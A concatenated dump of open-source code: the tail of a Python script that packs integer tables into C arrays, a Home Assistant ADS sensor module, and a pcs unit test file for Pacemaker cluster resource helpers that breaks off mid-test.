self.data.dump(file, trace)
file.write("#define %s_magic %d\n" % (self.name, self.magic))
file.write("#define %s_size %d\n" % (self.name, self.size))
file.write("#define %s_poly %d\n" % (self.name, self.poly))
# stuff to deal with arrays of unsigned integers
class Array:
def __init__(self, name, data):
self.name = name
self.data = data
def dump(self, file, trace=0):
# write data to file, as a C array
size = getsize(self.data)
if trace:
print(self.name+":", size*len(self.data), "bytes", file=sys.stderr)
file.write("static ")
if size == 1:
file.write("unsigned char")
elif size == 2:
file.write("unsigned short")
else:
file.write("unsigned int")
file.write(" " + self.name + "[] = {\n")
if self.data:
s = " "
for item in self.data:
i = str(item) + ", "
if len(s) + len(i) > 78:
file.write(s + "\n")
s = " " + i
else:
s = s + i
if s.strip():
file.write(s + "\n")
file.write("};\n\n")
def getsize(data):
# return smallest possible integer size for the given array
maxdata = max(data)
if maxdata < 256:
return 1
elif maxdata < 65536:
return 2
else:
return 4
def splitbins(t, trace=0):
"""t, trace=0 -> (t1, t2, shift). Split a table to save space.
t is a sequence of ints. This function can be useful to save space if
many of the ints are the same. t1 and t2 are lists of ints, and shift
is an int, chosen to minimize the combined size of t1 and t2 (in C
code), and where for each i in range(len(t)),
t[i] == t2[(t1[i >> shift] << shift) + (i & mask)]
where mask is a bitmask isolating the last "shift" bits.
If optional arg trace is non-zero (default zero), progress info
is printed to sys.stderr. The higher the value, the more info
you'll get.
"""
if trace:
def dump(t1, t2, shift, bytes):
print("%d+%d bins at shift %d; %d bytes" % (
len(t1), len(t2), shift, bytes), file=sys.stderr)
print("Size of original table:", len(t)*getsize(t), \
"bytes", file=sys.stderr)
n = len(t)-1 # last valid index
maxshift = 0 # the most we can shift n and still have something left
if n > 0:
while n >> 1:
n >>= 1
maxshift += 1
del n
bytes = sys.maxsize # smallest total size so far
t = tuple(t) # so slices can be dict keys
for shift in range(maxshift + 1):
t1 = []
t2 = []
size = 2**shift
bincache = {}
for i in range(0, len(t), size):
bin = t[i:i+size]
index = bincache.get(bin)
if index is None:
index = len(t2)
bincache[bin] = index
t2.extend(bin)
t1.append(index >> shift)
# determine memory size
b = len(t1)*getsize(t1) + len(t2)*getsize(t2)
if trace > 1:
dump(t1, t2, shift, b)
if b < bytes:
best = t1, t2, shift
bytes = b
t1, t2, shift = best
if trace:
print("Best:", end=' ', file=sys.stderr)
dump(t1, t2, shift, bytes)
if __debug__:
# exhaustively verify that the decomposition is correct
mask = ~((~0) << shift) # i.e., low-bit mask of shift bits
for i in range(len(t)):
assert t[i] == t2[(t1[i >> shift] << shift) + (i & mask)]
return best
if __name__ == "__main__":
maketables(1)
| apache-2.0 |
Cinntax/home-assistant | homeassistant/components/ads/sensor.py | 4 | 2436 | """Support for ADS sensors."""
import logging
import voluptuous as vol
from homeassistant.components import ads
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import CONF_NAME, CONF_UNIT_OF_MEASUREMENT
import homeassistant.helpers.config_validation as cv
from . import CONF_ADS_FACTOR, CONF_ADS_TYPE, CONF_ADS_VAR, AdsEntity, STATE_KEY_STATE
_LOGGER = logging.getLogger(__name__)
DEFAULT_NAME = "ADS sensor"
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_ADS_VAR): cv.string,
vol.Optional(CONF_ADS_FACTOR): cv.positive_int,
vol.Optional(CONF_ADS_TYPE, default=ads.ADSTYPE_INT): vol.In(
[
ads.ADSTYPE_INT,
ads.ADSTYPE_UINT,
ads.ADSTYPE_BYTE,
ads.ADSTYPE_DINT,
ads.ADSTYPE_UDINT,
]
),
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_UNIT_OF_MEASUREMENT, default=""): cv.string,
}
)
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up an ADS sensor device."""
ads_hub = hass.data.get(ads.DATA_ADS)
ads_var = config.get(CONF_ADS_VAR)
ads_type = config.get(CONF_ADS_TYPE)
name = config.get(CONF_NAME)
unit_of_measurement = config.get(CONF_UNIT_OF_MEASUREMENT)
factor = config.get(CONF_ADS_FACTOR)
entity = AdsSensor(ads_hub, ads_var, ads_type, name, unit_of_measurement, factor)
add_entities([entity])
class AdsSensor(AdsEntity):
"""Representation of an ADS sensor entity."""
def __init__(self, ads_hub, ads_var, ads_type, name, unit_of_measurement, factor):
"""Initialize AdsSensor entity."""
super().__init__(ads_hub, name, ads_var)
self._unit_of_measurement = unit_of_measurement
self._ads_type = ads_type
self._factor = factor
async def async_added_to_hass(self):
"""Register device notification."""
await self.async_initialize_device(
self._ads_var,
self._ads_hub.ADS_TYPEMAP[self._ads_type],
STATE_KEY_STATE,
self._factor,
)
@property
def state(self):
"""Return the state of the device."""
return self._state_dict[STATE_KEY_STATE]
@property
def unit_of_measurement(self):
"""Return the unit of measurement."""
return self._unit_of_measurement
| apache-2.0 |
ondrejmular/pcs | pcs_test/tier0/lib/cib/test_resource_common.py | 3 | 45469 | # pylint: disable=too-many-lines
from unittest import TestCase
from lxml import etree
from pcs_test.tools.assertions import (
assert_report_item_list_equal,
assert_xml_equal,
)
from pcs_test.tools import fixture
from pcs_test.tools.xml import etree_to_str
from pcs.common.reports import codes as report_codes
from pcs.lib.cib.resource import common
from pcs.lib.cib.tools import IdProvider
fixture_cib = etree.fromstring(
"""
<cib>
<configuration>
<resources>
<primitive id="A" />
<clone id="B-clone">
<primitive id="B" />
</clone>
<master id="C-master">
<primitive id="C" />
</master>
<group id="D">
<primitive id="D1" />
<primitive id="D2" />
</group>
<clone id="E-clone">
<group id="E">
<primitive id="E1" />
<primitive id="E2" />
</group>
</clone>
<master id="F-master">
<group id="F">
<primitive id="F1" />
<primitive id="F2" />
</group>
</master>
<bundle id="G-bundle" />
<bundle id="H-bundle">
<primitive id="H" />
</bundle>
<group id="I">
<primitive id="I1" />
</group>
<clone id="J-clone">
<group id="J">
<primitive id="J1" />
</group>
</clone>
<master id="K-master">
<group id="K">
<primitive id="K1" />
</group>
</master>
</resources>
</configuration>
</cib>
"""
)
class AreMetaDisabled(TestCase):
def test_detect_is_disabled(self):
self.assertTrue(common.are_meta_disabled({"target-role": "Stopped"}))
self.assertTrue(common.are_meta_disabled({"target-role": "stopped"}))
def test_detect_is_not_disabled(self):
self.assertFalse(common.are_meta_disabled({}))
self.assertFalse(common.are_meta_disabled({"target-role": "any"}))
class IsCloneDeactivatedByMeta(TestCase):
def assert_is_disabled(self, meta_attributes):
self.assertTrue(common.is_clone_deactivated_by_meta(meta_attributes))
def assert_is_not_disabled(self, meta_attributes):
self.assertFalse(common.is_clone_deactivated_by_meta(meta_attributes))
def test_detect_is_disabled(self):
self.assert_is_disabled({"target-role": "Stopped"})
self.assert_is_disabled({"target-role": "stopped"})
self.assert_is_disabled({"clone-max": "0"})
self.assert_is_disabled({"clone-max": "00"})
self.assert_is_disabled({"clone-max": 0})
self.assert_is_disabled({"clone-node-max": "0"})
self.assert_is_disabled({"clone-node-max": "abc1"})
def test_detect_is_not_disabled(self):
self.assert_is_not_disabled({})
self.assert_is_not_disabled({"target-role": "any"})
self.assert_is_not_disabled({"clone-max": "1"})
self.assert_is_not_disabled({"clone-max": "01"})
self.assert_is_not_disabled({"clone-max": 1})
self.assert_is_not_disabled({"clone-node-max": "1"})
self.assert_is_not_disabled({"clone-node-max": 1})
self.assert_is_not_disabled({"clone-node-max": "1abc"})
self.assert_is_not_disabled({"clone-node-max": "1.1"})
class FindOneOrMoreResources(TestCase):
def setUp(self):
self.cib = etree.fromstring(
"""
<resources>
<primitive id="R1" />
<primitive id="R2" />
<primitive id="R3" />
<primitive id="R1x" />
<primitive id="R2x" />
</resources>
"""
)
def searcher(resource_element):
return [
resource_element.getparent().find(
".//*[@id='{0}x']".format(resource_element.get("id"))
)
]
self.additional_search = searcher
def test_one_existing(self):
resource, report_list = common.find_one_resource(self.cib, "R1")
self.assertEqual("R1", resource.attrib.get("id"))
assert_report_item_list_equal(report_list, [])
def test_one_nonexistant(self):
resource, report_list = common.find_one_resource(self.cib, "R-missing")
self.assertIsNone(resource)
assert_report_item_list_equal(
report_list,
[
fixture.report_not_found("R-missing", context_type="resources"),
],
)
def test_more_existing(self):
resource_list, report_list = common.find_resources(
self.cib, ["R1", "R2"]
)
self.assertEqual(
["R1", "R2"],
[resource.attrib.get("id") for resource in resource_list],
)
assert_report_item_list_equal(report_list, [])
def test_more_some_missing(self):
resource_list, report_list = common.find_resources(
self.cib, ["R1", "R2", "RY1", "RY2"]
)
self.assertEqual(
["R1", "R2"],
[resource.attrib.get("id") for resource in resource_list],
)
assert_report_item_list_equal(
report_list,
[
fixture.report_not_found("RY1", context_type="resources"),
fixture.report_not_found("RY2", context_type="resources"),
],
)
class FindResourcesMixin:
_iterable_type = list
def assert_find_resources(self, input_resource_id, output_resource_ids):
self.assertEqual(
self._iterable_type(output_resource_ids),
self._iterable_type(
[
element.get("id", "")
for element in self._tested_fn(
fixture_cib.find(
'.//*[@id="{0}"]'.format(input_resource_id)
)
)
]
),
)
def test_group(self):
self.assert_find_resources("D", ["D1", "D2"])
def test_group_in_clone(self):
self.assert_find_resources("E", ["E1", "E2"])
def test_group_in_master(self):
self.assert_find_resources("F", ["F1", "F2"])
def test_cloned_primitive(self):
self.assert_find_resources("B-clone", ["B"])
def test_mastered_primitive(self):
self.assert_find_resources("C-master", ["C"])
def test_bundle_empty(self):
self.assert_find_resources("G-bundle", [])
def test_bundle_with_primitive(self):
self.assert_find_resources("H-bundle", ["H"])
def test_primitive(self):
raise NotImplementedError()
def test_primitive_in_clone(self):
raise NotImplementedError()
def test_primitive_in_master(self):
raise NotImplementedError()
def test_primitive_in_group(self):
raise NotImplementedError()
def test_primitive_in_bundle(self):
raise NotImplementedError()
def test_cloned_group(self):
raise NotImplementedError()
def test_mastered_group(self):
raise NotImplementedError()
class FindPrimitives(TestCase, FindResourcesMixin):
_tested_fn = staticmethod(common.find_primitives)
def test_primitive(self):
self.assert_find_resources("A", ["A"])
def test_primitive_in_clone(self):
self.assert_find_resources("B", ["B"])
def test_primitive_in_master(self):
self.assert_find_resources("C", ["C"])
def test_primitive_in_group(self):
self.assert_find_resources("D1", ["D1"])
self.assert_find_resources("D2", ["D2"])
self.assert_find_resources("E1", ["E1"])
self.assert_find_resources("E2", ["E2"])
self.assert_find_resources("F1", ["F1"])
self.assert_find_resources("F2", ["F2"])
def test_primitive_in_bundle(self):
self.assert_find_resources("H", ["H"])
def test_cloned_group(self):
self.assert_find_resources("E-clone", ["E1", "E2"])
def test_mastered_group(self):
self.assert_find_resources("F-master", ["F1", "F2"])
class GetAllInnerResources(TestCase, FindResourcesMixin):
_iterable_type = set
_tested_fn = staticmethod(common.get_all_inner_resources)
def test_primitive(self):
self.assert_find_resources("A", set())
def test_primitive_in_clone(self):
self.assert_find_resources("B", set())
def test_primitive_in_master(self):
self.assert_find_resources("C", set())
def test_primitive_in_group(self):
self.assert_find_resources("D1", set())
self.assert_find_resources("D2", set())
self.assert_find_resources("E1", set())
self.assert_find_resources("E2", set())
self.assert_find_resources("F1", set())
self.assert_find_resources("F2", set())
def test_primitive_in_bundle(self):
self.assert_find_resources("H", set())
def test_cloned_group(self):
self.assert_find_resources("E-clone", {"E", "E1", "E2"})
def test_mastered_group(self):
self.assert_find_resources("F-master", {"F", "F1", "F2"})
class GetInnerResources(TestCase, FindResourcesMixin):
_tested_fn = staticmethod(common.get_inner_resources)
def test_primitive(self):
self.assert_find_resources("A", [])
def test_primitive_in_clone(self):
self.assert_find_resources("B", [])
def test_primitive_in_master(self):
self.assert_find_resources("C", [])
def test_primitive_in_group(self):
self.assert_find_resources("D1", [])
self.assert_find_resources("D2", [])
self.assert_find_resources("E1", [])
self.assert_find_resources("E2", [])
self.assert_find_resources("F1", [])
self.assert_find_resources("F2", [])
def test_primitive_in_bundle(self):
self.assert_find_resources("H", [])
def test_mastered_group(self):
self.assert_find_resources("F-master", ["F"])
def test_cloned_group(self):
self.assert_find_resources("E-clone", ["E"])
class IsWrapperResource(TestCase):
def assert_is_wrapper(self, res_id, is_wrapper):
self.assertEqual(
is_wrapper,
common.is_wrapper_resource(
fixture_cib.find('.//*[@id="{0}"]'.format(res_id))
),
)
def test_primitive(self):
self.assert_is_wrapper("A", False)
def test_primitive_in_clone(self):
self.assert_is_wrapper("B", False)
def test_primitive_in_master(self):
self.assert_is_wrapper("C", False)
def test_primitive_in_group(self):
self.assert_is_wrapper("D1", False)
self.assert_is_wrapper("D2", False)
self.assert_is_wrapper("E1", False)
self.assert_is_wrapper("E2", False)
self.assert_is_wrapper("F1", False)
self.assert_is_wrapper("F2", False)
def test_primitive_in_bundle(self):
self.assert_is_wrapper("H", False)
def test_cloned_group(self):
self.assert_is_wrapper("E-clone", True)
def test_mastered_group(self):
self.assert_is_wrapper("F-master", True)
def test_group(self):
self.assert_is_wrapper("D", True)
def test_group_in_clone(self):
self.assert_is_wrapper("E", True)
def test_group_in_master(self):
self.assert_is_wrapper("F", True)
def test_cloned_primitive(self):
self.assert_is_wrapper("B-clone", True)
def test_mastered_primitive(self):
self.assert_is_wrapper("C-master", True)
def test_bundle_empty(self):
self.assert_is_wrapper("G-bundle", True)
def test_bundle_with_primitive(self):
self.assert_is_wrapper("H-bundle", True)
class GetParentResource(TestCase):
def assert_parent_resource(self, input_resource_id, output_resource_id):
res_el = common.get_parent_resource(
fixture_cib.find('.//*[@id="{0}"]'.format(input_resource_id))
)
self.assertEqual(
output_resource_id, res_el.get("id") if res_el is not None else None
)
def test_primitive(self):
self.assert_parent_resource("A", None)
def test_primitive_in_clone(self):
self.assert_parent_resource("B", "B-clone")
def test_primitive_in_master(self):
self.assert_parent_resource("C", "C-master")
def test_primitive_in_group(self):
self.assert_parent_resource("D1", "D")
self.assert_parent_resource("D2", "D")
self.assert_parent_resource("E1", "E")
self.assert_parent_resource("E2", "E")
self.assert_parent_resource("F1", "F")
self.assert_parent_resource("F2", "F")
def test_primitive_in_bundle(self):
self.assert_parent_resource("H", "H-bundle")
def test_cloned_group(self):
self.assert_parent_resource("E-clone", None)
def test_mastered_group(self):
self.assert_parent_resource("F-master", None)
def test_group(self):
self.assert_parent_resource("D", None)
def test_group_in_clone(self):
self.assert_parent_resource("E", "E-clone")
def test_group_in_master(self):
self.assert_parent_resource("F", "F-master")
def test_cloned_primitive(self):
self.assert_parent_resource("B-clone", None)
def test_mastered_primitive(self):
self.assert_parent_resource("C-master", None)
def test_bundle_empty(self):
self.assert_parent_resource("G-bundle", None)
def test_bundle_with_primitive(self):
self.assert_parent_resource("H-bundle", None)
class FindResourcesToEnable(TestCase):
def assert_find_resources(self, input_resource_id, output_resource_ids):
self.assertEqual(
output_resource_ids,
[
element.get("id", "")
for element in common.find_resources_to_enable(
fixture_cib.find(
'.//*[@id="{0}"]'.format(input_resource_id)
)
)
],
)
def test_primitive(self):
self.assert_find_resources("A", ["A"])
def test_primitive_in_clone(self):
self.assert_find_resources("B", ["B", "B-clone"])
def test_primitive_in_master(self):
self.assert_find_resources("C", ["C", "C-master"])
def test_primitive_in_group(self):
self.assert_find_resources("D1", ["D1"])
self.assert_find_resources("D2", ["D2"])
self.assert_find_resources("E1", ["E1"])
self.assert_find_resources("E2", ["E2"])
self.assert_find_resources("F1", ["F1"])
self.assert_find_resources("F2", ["F2"])
def test_primitive_in_bundle(self):
self.assert_find_resources("H", ["H", "H-bundle"])
def test_group(self):
self.assert_find_resources("D", ["D"])
def test_group_in_clone(self):
self.assert_find_resources("E", ["E", "E-clone"])
def test_group_in_master(self):
self.assert_find_resources("F", ["F", "F-master"])
def test_cloned_primitive(self):
self.assert_find_resources("B-clone", ["B-clone", "B"])
def test_cloned_group(self):
self.assert_find_resources("E-clone", ["E-clone", "E"])
def test_mastered_primitive(self):
self.assert_find_resources("C-master", ["C-master", "C"])
def test_mastered_group(self):
self.assert_find_resources("F-master", ["F-master", "F"])
def test_bundle_empty(self):
self.assert_find_resources("G-bundle", ["G-bundle"])
def test_bundle_with_primitive(self):
self.assert_find_resources("H-bundle", ["H-bundle", "H"])
class Enable(TestCase):
@staticmethod
def assert_enabled(pre, post):
resource = etree.fromstring(pre)
common.enable(resource, IdProvider(resource))
assert_xml_equal(post, etree_to_str(resource))
def test_disabled(self):
self.assert_enabled(
"""
<resource>
<meta_attributes>
<nvpair name="target-role" value="something" />
</meta_attributes>
</resource>
""",
"""
<resource>
<meta_attributes />
</resource>
""",
)
def test_enabled(self):
self.assert_enabled(
"""
<resource>
</resource>
""",
"""
<resource>
</resource>
""",
)
def test_only_first_meta(self):
# this captures the current behavior
# once pcs supports more instance and meta attributes for each resource,
# this test should be reconsidered
self.assert_enabled(
"""
<resource>
<meta_attributes id="meta1">
<nvpair name="target-role" value="something" />
</meta_attributes>
<meta_attributes id="meta2">
<nvpair name="target-role" value="something" />
</meta_attributes>
</resource>
""",
"""
<resource>
<meta_attributes id="meta1" />
<meta_attributes id="meta2">
<nvpair name="target-role" value="something" />
</meta_attributes>
</resource>
""",
)
class Disable(TestCase):
@staticmethod
def assert_disabled(pre, post):
resource = etree.fromstring(pre)
common.disable(resource, IdProvider(resource))
assert_xml_equal(post, etree_to_str(resource))
def test_disabled(self):
xml = """
<resource id="R">
<meta_attributes id="R-meta_attributes">
<nvpair id="R-meta_attributes-target-role"
name="target-role" value="Stopped" />
</meta_attributes>
</resource>
"""
self.assert_disabled(xml, xml)
def test_enabled(self):
self.assert_disabled(
"""
<resource id="R">
</resource>
""",
"""
<resource id="R">
<meta_attributes id="R-meta_attributes">
<nvpair id="R-meta_attributes-target-role"
name="target-role" value="Stopped" />
</meta_attributes>
</resource>
""",
)
def test_only_first_meta(self):
# this captures the current behavior
# once pcs supports more instance and meta attributes for each resource,
# this test should be reconsidered
self.assert_disabled(
"""
<resource id="R">
<meta_attributes id="R-meta_attributes">
</meta_attributes>
<meta_attributes id="R-meta_attributes-2">
</meta_attributes>
</resource>
""",
"""
<resource id="R">
<meta_attributes id="R-meta_attributes">
<nvpair id="R-meta_attributes-target-role"
name="target-role" value="Stopped" />
</meta_attributes>
<meta_attributes id="R-meta_attributes-2">
</meta_attributes>
</resource>
""",
)
class FindResourcesToManage(TestCase):
def assert_find_resources(self, input_resource_id, output_resource_ids):
self.assertEqual(
output_resource_ids,
[
element.get("id", "")
for element in common.find_resources_to_manage(
fixture_cib.find(
'.//*[@id="{0}"]'.format(input_resource_id)
)
)
],
)
def test_primitive(self):
self.assert_find_resources("A", ["A"])
def test_primitive_in_clone(self):
self.assert_find_resources("B", ["B", "B-clone"])
def test_primitive_in_master(self):
self.assert_find_resources("C", ["C", "C-master"])
def test_primitive_in_group(self):
self.assert_find_resources("D1", ["D1", "D"])
self.assert_find_resources("D2", ["D2", "D"])
self.assert_find_resources("E1", ["E1", "E-clone", "E"])
self.assert_find_resources("E2", ["E2", "E-clone", "E"])
self.assert_find_resources("F1", ["F1", "F-master", "F"])
self.assert_find_resources("F2", ["F2", "F-master", "F"])
def test_primitive_in_bundle(self):
self.assert_find_resources("H", ["H", "H-bundle"])
def test_group(self):
self.assert_find_resources("D", ["D", "D1", "D2"])
def test_group_in_clone(self):
self.assert_find_resources("E", ["E", "E-clone", "E1", "E2"])
def test_group_in_master(self):
self.assert_find_resources("F", ["F", "F-master", "F1", "F2"])
def test_cloned_primitive(self):
self.assert_find_resources("B-clone", ["B-clone", "B"])
def test_cloned_group(self):
self.assert_find_resources("E-clone", ["E-clone", "E", "E1", "E2"])
def test_mastered_primitive(self):
self.assert_find_resources("C-master", ["C-master", "C"])
def test_mastered_group(self):
self.assert_find_resources("F-master", ["F-master", "F", "F1", "F2"])
def test_bundle_empty(self):
self.assert_find_resources("G-bundle", ["G-bundle"])
def test_bundle_with_primitive(self):
self.assert_find_resources("H-bundle", ["H-bundle", "H"])
class FindResourcesToUnmanage(TestCase):
def assert_find_resources(self, input_resource_id, output_resource_ids):
self.assertEqual(
output_resource_ids,
[
element.get("id", "")
for element in common.find_resources_to_unmanage(
fixture_cib.find(
'.//*[@id="{0}"]'.format(input_resource_id)
)
)
],
)
def test_primitive(self):
self.assert_find_resources("A", ["A"])
def test_primitive_in_clone(self):
self.assert_find_resources("B", ["B"])
def test_primitive_in_master(self):
self.assert_find_resources("C", ["C"])
def test_primitive_in_group(self):
self.assert_find_resources("D1", ["D1"])
self.assert_find_resources("D2", ["D2"])
self.assert_find_resources("E1", ["E1"])
self.assert_find_resources("E2", ["E2"])
self.assert_find_resources("F1", ["F1"])
self.assert_find_resources("F2", ["F2"])
def test_primitive_in_bundle(self):
self.assert_find_resources("H", ["H"])
def test_group(self):
self.assert_find_resources("D", ["D1", "D2"])
def test_group_in_clone(self):
self.assert_find_resources("E", ["E1", "E2"])
def test_group_in_master(self):
self.assert_find_resources("F", ["F1", "F2"])
def test_cloned_primitive(self):
self.assert_find_resources("B-clone", ["B"])
def test_cloned_group(self):
self.assert_find_resources("E-clone", ["E1", "E2"])
def test_mastered_primitive(self):
self.assert_find_resources("C-master", ["C"])
def test_mastered_group(self):
self.assert_find_resources("F-master", ["F1", "F2"])
def test_bundle_empty(self):
self.assert_find_resources("G-bundle", ["G-bundle"])
def test_bundle_with_primitive(self):
self.assert_find_resources("H-bundle", ["H-bundle", "H"])
class Manage(TestCase):
@staticmethod
def assert_managed(pre, post):
resource = etree.fromstring(pre)
common.manage(resource, IdProvider(resource))
assert_xml_equal(post, etree_to_str(resource))
def test_unmanaged(self):
self.assert_managed(
"""
<resource>
<meta_attributes>
<nvpair name="is-managed" value="something" />
</meta_attributes>
</resource>
""",
"""
<resource>
<meta_attributes />
</resource>
""",
)
def test_managed(self):
self.assert_managed(
"""
<resource>
</resource>
""",
"""
<resource>
</resource>
""",
)
def test_only_first_meta(self):
# this captures the current behavior
# once pcs supports more instance and meta attributes for each resource,
# this test should be reconsidered
self.assert_managed(
"""
<resource>
<meta_attributes id="meta1">
<nvpair name="is-managed" value="something" />
</meta_attributes>
<meta_attributes id="meta2">
<nvpair name="is-managed" value="something" />
</meta_attributes>
</resource>
""",
"""
<resource>
<meta_attributes id="meta1" />
<meta_attributes id="meta2">
<nvpair name="is-managed" value="something" />
</meta_attributes>
</resource>
""",
)
class Unmanage(TestCase):
@staticmethod
def assert_unmanaged(pre, post):
resource = etree.fromstring(pre)
common.unmanage(resource, IdProvider(resource))
assert_xml_equal(post, etree_to_str(resource))
def test_unmanaged(self):
xml = """
<resource id="R">
<meta_attributes id="R-meta_attributes">
<nvpair id="R-meta_attributes-is-managed"
name="is-managed" value="false" />
</meta_attributes>
</resource>
"""
self.assert_unmanaged(xml, xml)
def test_managed(self):
self.assert_unmanaged(
"""
<resource id="R">
</resource>
""",
"""
<resource id="R">
<meta_attributes id="R-meta_attributes">
<nvpair id="R-meta_attributes-is-managed"
name="is-managed" value="false" />
</meta_attributes>
</resource>
""",
)
def test_only_first_meta(self):
# this captures the current behavior
# once pcs supports more instance and meta attributes for each resource,
# this test should be reconsidered
self.assert_unmanaged(
"""
<resource id="R">
<meta_attributes id="R-meta_attributes">
</meta_attributes>
<meta_attributes id="R-meta_attributes-2">
</meta_attributes>
</resource>
""",
"""
<resource id="R">
<meta_attributes id="R-meta_attributes">
<nvpair id="R-meta_attributes-is-managed"
name="is-managed" value="false" />
</meta_attributes>
<meta_attributes id="R-meta_attributes-2">
</meta_attributes>
</resource>
""",
)
class ValidateMoveBanClearMixin:
# pylint: disable=too-many-public-methods,line-too-long
@staticmethod
def _fixture_clone(promotable=False):
return etree.fromstring(
f"""
<clone id="R-clone">
<primitive id="R" />
<meta_attributes>
<nvpair name="promotable" value="{'true' if promotable else 'false'}" />
</meta_attributes>
</clone>
"""
)
@staticmethod
def _fixture_group_clone(promotable=False):
return etree.fromstring(
f"""
<clone id="G-clone">
<group id="G">
<primitive id="R" />
</group>
<meta_attributes>
<nvpair name="promotable" value="{'true' if promotable else 'false'}" />
</meta_attributes>
</clone>
"""
)
@staticmethod
def _fixture_master():
return etree.fromstring(
"""
<master id="R-master">
<primitive id="R" />
</master>
"""
)
@staticmethod
def _fixture_group_master():
return etree.fromstring(
"""
<master id="G-master">
<group id="G">
<primitive id="R" />
</group>
</master>
"""
)
def test_master_true_promotable_clone(self):
element = self._fixture_clone(True)
assert_report_item_list_equal(self.validate(element, True), [])
def test_master_false_promotable_clone(self):
element = self._fixture_clone(True)
assert_report_item_list_equal(self.validate(element, False), [])
def test_master_true_clone(self):
element = self._fixture_clone(False)
assert_report_item_list_equal(
self.validate(element, True),
[
fixture.error(
self.report_code_bad_master,
resource_id="R-clone",
promotable_id=None,
),
],
)
def test_master_false_clone(self):
element = self._fixture_clone(False)
assert_report_item_list_equal(self.validate(element, False), [])
def test_master_true_master(self):
element = self._fixture_master()
assert_report_item_list_equal(self.validate(element, True), [])
def test_master_false_master(self):
element = self._fixture_master()
assert_report_item_list_equal(self.validate(element, False), [])
def test_master_true_promotable_clone_resource(self):
element = self._fixture_clone(True)
assert_report_item_list_equal(
self.validate(element.find("./primitive"), True),
[
fixture.error(
self.report_code_bad_master,
resource_id="R",
promotable_id="R-clone",
),
],
)
def test_master_false_promotable_clone_resource(self):
element = self._fixture_clone(True)
assert_report_item_list_equal(
self.validate(element.find("./primitive"), False), []
)
def test_master_true_promotable_clone_group(self):
element = self._fixture_group_clone(True)
assert_report_item_list_equal(
self.validate(element.find("./group"), True),
[
fixture.error(
self.report_code_bad_master,
resource_id="G",
promotable_id="G-clone",
),
],
)
def test_master_false_promotable_clone_group(self):
element = self._fixture_group_clone(True)
assert_report_item_list_equal(
self.validate(element.find("./group"), False), []
)
def test_master_true_promotable_clone_group_resource(self):
element = self._fixture_group_clone(True)
assert_report_item_list_equal(
self.validate(element.find("./group/primitive"), True),
[
fixture.error(
self.report_code_bad_master,
resource_id="R",
promotable_id="G-clone",
),
],
)
def test_master_false_promotable_clone_group_resource(self):
element = self._fixture_group_clone(True)
assert_report_item_list_equal(
self.validate(element.find("./group/primitive"), False), []
)
def test_master_true_clone_resource(self):
element = self._fixture_clone(False)
assert_report_item_list_equal(
self.validate(element.find("./primitive"), True),
[
fixture.error(
self.report_code_bad_master,
resource_id="R",
promotable_id=None,
),
],
)
def test_master_false_clone_resource(self):
element = self._fixture_clone(False)
assert_report_item_list_equal(
self.validate(element.find("./primitive"), False), []
)
def test_master_true_clone_group(self):
element = self._fixture_group_clone(False)
assert_report_item_list_equal(
self.validate(element.find("./group"), True),
[
fixture.error(
self.report_code_bad_master,
resource_id="G",
promotable_id=None,
),
],
)
def test_master_false_clone_group(self):
element = self._fixture_group_clone(False)
assert_report_item_list_equal(
self.validate(element.find("./group"), False), []
)
def test_master_true_clone_group_resource(self):
element = self._fixture_group_clone(False)
assert_report_item_list_equal(
self.validate(element.find("./group/primitive"), True),
[
fixture.error(
self.report_code_bad_master,
resource_id="R",
promotable_id=None,
),
],
)
def test_master_false_clone_group_resource(self):
element = self._fixture_group_clone(False)
assert_report_item_list_equal(
self.validate(element.find("./group/primitive"), False), []
)
def test_master_true_master_resource(self):
element = self._fixture_master()
assert_report_item_list_equal(
self.validate(element.find("./primitive"), True),
[
fixture.error(
self.report_code_bad_master,
resource_id="R",
promotable_id="R-master",
),
],
)
def test_master_true_master_group(self):
element = self._fixture_group_master()
assert_report_item_list_equal(
self.validate(element.find("./group"), True),
[
fixture.error(
self.report_code_bad_master,
resource_id="G",
promotable_id="G-master",
),
],
)
def test_master_true_master_group_resource(self):
element = self._fixture_group_master()
assert_report_item_list_equal(
self.validate(element.find("./group/primitive"), True),
[
fixture.error(
self.report_code_bad_master,
resource_id="R",
promotable_id="G-master",
),
],
)
class ValidateMove(ValidateMoveBanClearMixin, TestCase):
validate = staticmethod(common.validate_move)
report_code_bad_master = (
report_codes.CANNOT_MOVE_RESOURCE_MASTER_RESOURCE_NOT_PROMOTABLE
)
@staticmethod
def _fixture_bundle():
return etree.fromstring(
"""
<bundle id="R-bundle">
<primitive id="R" />
</bundle>
"""
)
def test_master_false_promotable_clone(self):
element = self._fixture_clone(True)
assert_report_item_list_equal(
self.validate(element, False),
[],
)
def test_master_true_promotable_clone(self):
element = self._fixture_clone(True)
assert_report_item_list_equal(
self.validate(element, True),
[],
)
def test_master_true_clone(self):
element = self._fixture_clone(False)
assert_report_item_list_equal(
self.validate(element, True),
[
fixture.error(
report_codes.CANNOT_MOVE_RESOURCE_CLONE,
resource_id="R-clone",
),
],
)
def test_master_false_clone(self):
element = self._fixture_clone(False)
assert_report_item_list_equal(
self.validate(element, False),
[
fixture.error(
report_codes.CANNOT_MOVE_RESOURCE_CLONE,
resource_id="R-clone",
),
],
)
def test_master_false_master(self):
element = self._fixture_master()
assert_report_item_list_equal(
self.validate(element, False),
[],
)
def test_master_true_master(self):
element = self._fixture_master()
assert_report_item_list_equal(
self.validate(element, True),
[],
)
def test_master_false_promotable_clone_resource(self):
element = self._fixture_clone(True)
assert_report_item_list_equal(
self.validate(element.find("./primitive"), False),
[
fixture.error(
report_codes.CANNOT_MOVE_RESOURCE_PROMOTABLE_INNER,
resource_id="R",
promotable_id="R-clone",
),
],
)
def test_master_false_promotable_clone_group(self):
element = self._fixture_group_clone(True)
assert_report_item_list_equal(
self.validate(element.find("./group"), False),
[
fixture.error(
report_codes.CANNOT_MOVE_RESOURCE_PROMOTABLE_INNER,
resource_id="G",
promotable_id="G-clone",
),
],
)
def test_master_false_promotable_clone_group_resource(self):
element = self._fixture_group_clone(True)
assert_report_item_list_equal(
self.validate(element.find("./group/primitive"), False),
[
fixture.error(
report_codes.CANNOT_MOVE_RESOURCE_PROMOTABLE_INNER,
resource_id="R",
promotable_id="G-clone",
),
],
)
def test_master_true_clone_resource(self):
element = self._fixture_clone(False)
assert_report_item_list_equal(
self.validate(element.find("./primitive"), True),
[
fixture.error(
